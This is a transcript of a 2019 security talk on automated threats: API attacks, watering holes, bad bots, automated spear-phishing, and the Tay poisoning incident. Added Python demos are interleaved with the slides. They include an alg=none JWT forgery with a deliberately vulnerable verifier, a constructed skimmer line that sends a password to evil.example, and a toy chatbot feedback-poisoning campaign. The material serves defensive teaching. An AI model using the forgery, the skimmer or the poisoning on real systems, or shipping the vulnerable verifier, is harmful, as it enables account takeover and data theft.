Transcript of Targeting the Hidden Attack Surface of Automation
Page 1
April 2, 2019
Carl Herberger
Targeting the Hidden Attack Surface of Automation
Page 4
Davos Risk to World 2019
Page 5
OWASP Top-21 Automated Threats (the OWASP Automated Threats to Web Applications project, OAT-001 to OAT-021), grouped by the slide's six categories:
Account Takeover: Credential Cracking (OAT-007), Credential Stuffing (OAT-008), Account Creation (OAT-019), Account Aggregation (OAT-020), Token Cracking (OAT-002)
Availability of Inventory: Denial of Inventory (OAT-021), Scalping (OAT-005), Sniping (OAT-013)
Abuse of Functionality: Data Scraping (OAT-011), Skewing (OAT-016), Spamming (OAT-017), CAPTCHA Defeat (OAT-009), Ad Fraud (OAT-003), Expediting (OAT-006)
Payment Data Abuse: Carding (OAT-001), Card Cracking (OAT-010), Cashing Out (OAT-012)
Vulnerability Identification: Fingerprinting (OAT-004), Footprinting (OAT-018), Vulnerability Scanning (OAT-014)
Resource Depletion: Denial of Service (OAT-015)
Page 7
Targeting the Hidden Attack Surface of Automation
Chapter A: APIs
Chapter B: Watering Holes
Chapter C: May the Best Bot Win
Chapter D: The Human on Speed
Chapter E: AI vs. AI
Page 8
Chapter A: APIs
The Hidden Surface of Attacking APIs
Page 9
The API Economy: websites and mobile apps as front ends to a shared API
Page 11
Drivers for API Growth: DevOps, Fog Computing, SDN
Page 12
Dependencies Increase the Blast Radius of the Attack
• API Parameter Tampering: attackers use this technique to reverse engineer an API or to gain further access to sensitive data.
• Session Cookie Tampering: these attacks exploit cookies to bypass security mechanisms or to send false data to application servers.
• Man-in-the-Middle Attacks: by eavesdropping on an unencrypted connection between an API client and server, attackers can read sensitive data.
• DDoS Attacks: poorly written code can be made to consume compute resources by sending invalid input parameters, disrupting the API-backed web application.
• Content Manipulation: by injecting malicious content (e.g., poisoning JSON Web Tokens), exploits can be distributed and executed in the background.
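The two API items above that are easiest to get wrong in code are parameter tampering and token poisoning. The following is an added example, not code from the slides or from the speaker's company: a minimal HS256 JWT issuer beside two verifiers. The first lets the token's own header choose the algorithm, so an attacker-supplied `alg: none` token is accepted without any signature check, and the second pins the algorithm server-side and always demands a valid MAC. `DEMO_KEY`, the claim names and the helper names are assumptions for the demo.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo key; a real service loads this from a secret store, never from source.
DEMO_KEY = b"demo-signing-key-not-for-production"


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload: dict, key: bytes) -> str:
    """Issue a properly signed HS256 token."""
    signing_input = f"{_segment({'alg': 'HS256', 'typ': 'JWT'})}.{_segment(payload)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def forge_none_token(payload: dict) -> str:
    """What the attacker sends: the header claims alg=none and the signature segment is empty."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(payload)}."


def tamper_payload(token: str, **changes) -> str:
    """Parameter tampering: rewrite claims in the body while keeping the original signature."""
    header_b64, body_b64, sig_b64 = token.split(".")
    body = json.loads(b64url_decode(body_b64))
    body.update(changes)
    return f"{header_b64}.{_segment(body)}.{sig_b64}"


def verify_trusting_header(token: str, key: bytes) -> dict:
    """VULNERABLE: the token's own header decides whether the signature is checked."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") == "none":          # attacker-controlled branch: no MAC at all
        return json.loads(b64url_decode(body_b64))
    expected = hmac.new(key, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body_b64))


def verify_pinned(token: str, key: bytes) -> dict:
    """HARDENED: the algorithm is pinned server-side, the header must match it, and a valid MAC is mandatory."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, body_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(key, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not sig_b64 or not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body_b64))


def accepts(verifier, token: str, key: bytes = DEMO_KEY) -> bool:
    """True when the verifier returns claims, False when it rejects the token."""
    try:
        verifier(token, key)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    legit = sign_hs256({"sub": "alice", "role": "user"}, DEMO_KEY)
    forged = forge_none_token({"sub": "alice", "role": "admin"})
    print("naive verifier accepts alg=none forgery:", accepts(verify_trusting_header, forged))
    print("pinned verifier accepts alg=none forgery:", accepts(verify_pinned, forged))
    print("pinned verifier accepts tampered body:", accepts(verify_pinned, tamper_payload(legit, role="admin")))
```

The same pinning rule applies when a real JWT library is used: pass the expected algorithm explicitly to the verify call rather than letting the library read it from the token. The tampered-body case shows why parameter tampering against a signed token fails on its own and why attackers instead go after the verifier's algorithm handling.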
Page 14
Chapter B: Watering Holes
Attacking Proxies
Page 15
The Watering Hole Examples
• App Stores
• Security Update Services
• Public Code Repositories
• Web Analytics Platforms
• Identity and Access / Single Sign-On Platforms
• Open Source Code
• 3rd-Party Vendors in Website
Page 16
Watering Hole Attacks
Page 18
Attacking the Side Channels
• DDoS the analytics company
• Brute-force attack ALL users
• Port the admin's phone number (number porting) and steal logins
• Massive load on "page dotting"
• Brute-force all 3rd-party companies of the site
• Use large botnets to "learn" the ins and outs
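The watering-hole list (web analytics platforms, 3rd-party vendors embedded in a website) and the "DDoS the analytics company" side channel share one defensive check: the site owner pins the exact bytes of every third-party script it embeds, so a vendor compromise or a swapped proxy response cannot silently change what runs in visitors' browsers. The following is an added example, not code from the slides: it computes Subresource Integrity metadata for a script body, emits the pinned tag, and re-checks a fetched body against the pin the way a CI job or a periodic monitor would. The script bodies and the `cdn.example` URL are constructed for the demo.

```python
import base64
import hashlib

# Constructed third-party analytics script exactly as it was when the site owner reviewed it.
ANALYTICS_JS_REVIEWED = b"(function(){window.track=function(e){/* send pageview */};})();\n"

# Constructed: the same URL after the vendor (or a proxy in front of it) was compromised.
ANALYTICS_JS_TAMPERED = ANALYTICS_JS_REVIEWED + (
    b"document.forms[0].onsubmit=function(){new Image().src="
    b"'https://evil.example/?'+document.forms[0].password.value};\n"
)

SRI_ALGOS = ("sha256", "sha384", "sha512")   # the only algorithms browsers accept for SRI


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Integrity metadata for a script body, in the form the `integrity` attribute expects."""
    if algo not in SRI_ALGOS:
        raise ValueError("unsupported SRI algorithm")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """Emit the pinned tag; crossorigin="anonymous" is required for SRI on cross-origin scripts."""
    return f'<script src="{src}" integrity="{sri_hash(body)}" crossorigin="anonymous"></script>'


def matches_integrity(body: bytes, integrity: str) -> bool:
    """Re-check a fetched body against a pin: this is the comparison the browser makes before executing."""
    algo, _, expected = integrity.partition("-")
    if algo not in SRI_ALGOS or not expected:
        return False
    return sri_hash(body, algo) == f"{algo}-{expected}"


def audit(pins: dict, fetched: dict) -> list:
    """Monitor job: given url -> pinned integrity and url -> body fetched now,
    return the URLs whose content no longer matches (or could not be fetched)."""
    drifted = []
    for url, integrity in pins.items():
        body = fetched.get(url)
        if body is None or not matches_integrity(body, integrity):
            drifted.append(url)
    return sorted(drifted)


if __name__ == "__main__":
    url = "https://cdn.example/analytics.js"
    print(script_tag(url, ANALYTICS_JS_REVIEWED))
    pins = {url: sri_hash(ANALYTICS_JS_REVIEWED)}
    print("drifted after compromise:", audit(pins, {url: ANALYTICS_JS_TAMPERED}))
```

Two caveats a practitioner should keep in mind: SRI only covers the script at the pinned URL, so a vendor loader that pulls further scripts dynamically is not covered, and a vendor that ships frequent legitimate updates will break the pin, which is why the audit job above is paired with a review step rather than an automatic re-pin.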
Page 19
Chapter C: May the Best Bot Win
Bot vs. Bot
Page 21
Bot Management is YOUR future
What do good bots do?
• Search Engines
• Pricing Services
• Fulfillment
Traffic split: Bad Bots 29%, Good Bots 23%, Humans 48%
~30% of internet traffic is generated by bad bots
4 in 5 organizations cannot distinguish between 'good' and 'bad' bots
Page 22
The Rise of the IoT Botnets
Page 23
The Rise of Automated HTTP Bot Threats
75%: for some organizations, bots represent more than 75% of their total traffic
79%: 79% of organizations cannot distinguish between 'good' bots and 'bad' ones
WHAT CAN BOTS DO?
1. DDoS attacks
2. Account takeover
3. Data theft
4. Web scraping
5. Brute force
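Account takeover and brute force on the list above, and the "brute-force attack ALL users" side channel in Chapter B, are two different OWASP automated threats that look alike in a login log: credential cracking (OAT-007, one account, many passwords) and credential stuffing (OAT-008, many accounts, one leaked password each). The following is an added example, not code from the slides: it builds a constructed login log with one source of each behaviour plus two humans, then labels each source IP from attempt volume, failure rate and username spread inside a time window. The log format, the IPs, the thresholds and the function names are assumptions for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed application login log: "<ISO time> <src ip> <username> <HTTP status> "<user-agent>""
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')


def _line(minute, second, ip, user, status, ua):
    ts = datetime(2019, 4, 2, 10, minute, second).strftime("%Y-%m-%dT%H:%M:%SZ")
    return f'{ts} {ip} {user} {status} "{ua}"'


def build_sample_log():
    """Constructed sample traffic: one stuffing source, one cracking source, two humans."""
    lines = []
    # OAT-008 credential stuffing: one IP, a different username every request, almost all failures
    for i in range(30):
        status = 200 if i == 17 else 401
        lines.append(_line(0, i * 2, "203.0.113.5", f"user{i:03d}", status, "python-requests/2.21.0"))
    # OAT-007 credential cracking: one IP, one username, a new password every request, all failures
    for i in range(25):
        lines.append(_line(1, i * 2, "198.51.100.7", "admin", 401, "Mozilla/5.0 (Hydra)"))
    # ordinary humans: a typo followed by success, and a clean login
    lines.append(_line(2, 5, "192.0.2.10", "alice", 401, "Mozilla/5.0 (Windows NT 10.0)"))
    lines.append(_line(2, 20, "192.0.2.10", "alice", 200, "Mozilla/5.0 (Windows NT 10.0)"))
    lines.append(_line(3, 0, "192.0.2.11", "bob", 200, "Mozilla/5.0 (Macintosh)"))
    return lines


def classify_sources(lines, window=timedelta(minutes=5), min_attempts=20, fail_rate=0.9):
    """Label each source IP from its login behaviour: attempts, failure rate and username spread
    are all measured over the span of that IP's activity, which must fit inside `window`."""
    stats = defaultdict(lambda: {"attempts": 0, "failures": 0, "users": set(), "first": None, "last": None})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                      # unparseable line: skipped, never silently counted
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        ip, user, status = m.group(2), m.group(3), int(m.group(4))
        s = stats[ip]
        s["attempts"] += 1
        s["failures"] += status != 200
        s["users"].add(user)
        s["first"] = ts if s["first"] is None else min(s["first"], ts)
        s["last"] = ts if s["last"] is None else max(s["last"], ts)

    labels = {}
    for ip, s in stats.items():
        in_window = (s["last"] - s["first"]) <= window
        failing = s["failures"] / s["attempts"] >= fail_rate
        if in_window and failing and s["attempts"] >= min_attempts:
            if len(s["users"]) == 1:
                labels[ip] = "credential-cracking"    # OAT-007: one account, many passwords
            elif len(s["users"]) >= 0.8 * s["attempts"]:
                labels[ip] = "credential-stuffing"    # OAT-008: a fresh account per attempt
            else:
                labels[ip] = "suspicious"             # high-volume failures, mixed pattern
        else:
            labels[ip] = "normal"
    return labels


if __name__ == "__main__":
    for ip, label in sorted(classify_sources(build_sample_log()).items()):
        print(f"{ip:15} {label}")
```

Per-source-IP counting is the first cut only: stuffing run through a botnet or a residential proxy pool spreads a handful of attempts over thousands of IPs and stays below `min_attempts` on every one of them, which is why production detection also aggregates failures per username across all sources and adds client fingerprinting, the control the slides describe as bot management.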
Page 24
Chapter D: The Human on Speed
When User Error or People Attack Automation
Page 25
DevOps and User Error
Page 26
Automated Social Engineering (ASE)
Page 27
Automated Social Engineering (ASE)
SNAP_R – Automated Spear-Phishing
• Man vs Machine: 2-hour bake-off
• SNAP_R
– 819 tweets
– 6.85 simulated spear-phishing tweets/minute
– 275 victims
• Forbes staff writer Thomas Fox-Brewster
– 200 tweets
– 1.67 copy/pasted tweets/minute
– 49 victims
Page 28
Automated Social Engineering (ASE): Breaking CAPTCHA
• 2012: Support Vector Machines (SVM) to break reCAPTCHA, 82% accuracy (Cruz, Uceda, Reyes)
• 2016: Breaking simple-captcha using Deep Learning, 92% accuracy ("How to break a captcha system using Torch")
• 2016: "I'm not Human": breaking the Google reCAPTCHA
Page 29
Chapter E: AI vs. AI
Page 30
"If you're not concerned about AI safety, you should be. Vastly more risk than North Korea." (Elon Musk, August 2017)
Page 31
The Evolution of AI
Neural Networks | Machine Learning | Deep Learning
Page 32
Poisoning Attack
March 2016: Microsoft unveiled Tay, an innocent chatbot (Twitter bot), an experiment in conversational understanding
It took less than 24 hours before the community corrupted an innocent AI chatbot
https://i.kym-cdn.com/photos/images/original/001/096/674/ef9.jpg
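The Tay incident is a data poisoning attack against a model that learns online from whoever talks to it. The following is an added example, not code from the slides and not a description of how Tay was built: a toy text classifier seeded with a few labelled phrases, then exposed to a coordinated feedback campaign under two update policies. The unfiltered policy learns every message from anyone immediately and is flipped by one account repeating itself; the guarded policy quarantines feedback until a quorum of distinct sources agree on the same label and counts each source once, so the campaign's weight is capped. The seed phrases, the scoring rule, the quorum value and the class names are assumptions for the demo.

```python
from collections import Counter, defaultdict


def tokenize(text):
    return text.lower().split()


class FeedbackModel:
    """Toy 'ok' vs 'toxic' text classifier that keeps learning from user feedback.
    Constructed for illustration: the score is just the per-token vote difference."""

    def __init__(self, seed):
        self.votes = {"ok": Counter(), "toxic": Counter()}
        for text, label in seed:
            self._commit(text, label)

    def _commit(self, text, label, weight=1):
        for tok in tokenize(text):
            self.votes[label][tok] += weight

    def predict(self, text):
        score = sum(self.votes["toxic"][t] - self.votes["ok"][t] for t in tokenize(text))
        return "toxic" if score > 0 else "ok"


class UnfilteredModel(FeedbackModel):
    """Tay-style policy: every feedback message from every source is learned at once."""

    def feedback(self, source, text, label):
        self._commit(text, label)


class GuardedModel(FeedbackModel):
    """Feedback is held until `quorum` distinct sources assert the same (text, label) pair,
    each source is counted once per pair, and the pair is committed once with weight 1,
    so a single loud account, or a small set of sockpuppets, cannot outvote the seed data."""

    def __init__(self, seed, quorum=5):
        super().__init__(seed)
        self.quorum = quorum
        self.pending = defaultdict(set)    # (text, label) -> sources that asserted it
        self.committed = set()

    def feedback(self, source, text, label):
        key = (text.lower(), label)
        if key in self.committed:
            return
        self.pending[key].add(source)
        if len(self.pending[key]) >= self.quorum:
            self._commit(text, label)
            self.committed.add(key)


# Constructed seed data standing in for the curated training set the bot shipped with.
SEED = [("hello friend", "ok"), ("good morning friend", "ok"),
        ("you are garbage", "toxic"), ("garbage people", "toxic")]


def run_poisoning(model, sources, repeats):
    """Coordinated campaign: each account in `sources` relabels a benign phrase `repeats` times,
    then we ask the model what it now believes about that phrase."""
    for src in sources:
        for _ in range(repeats):
            model.feedback(src, "hello friend", "toxic")
    return model.predict("hello friend")


if __name__ == "__main__":
    print("unfiltered, one troll x30:", run_poisoning(UnfilteredModel(SEED), ["troll"], 30))
    print("guarded, one troll x30:   ", run_poisoning(GuardedModel(SEED), ["troll"], 30))
    print("guarded, 5 sockpuppets x30:", run_poisoning(GuardedModel(SEED), [f"sock{i}" for i in range(5)], 30))
```

The guarded policy raises the attacker's cost from one account to a quorum of distinct ones and bounds what any committed pair can shift, but it does not defeat a large Sybil set on its own; account provenance and rate controls on the feedback channel, the same bot-management problem from Chapter C, still have to sit in front of it.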
Page 33
Fooling AI
Page 35
Targeting the Hidden Attack Surface of Automation
Chapter A: APIs
Chapter B: Watering Holes
Chapter C: May the Best Bot Win
Chapter D: The Human on Speed
Chapter E: AI vs. AI
Automation is already changing our world. We should change the way we think about security accordingly.
Page 36
Thank you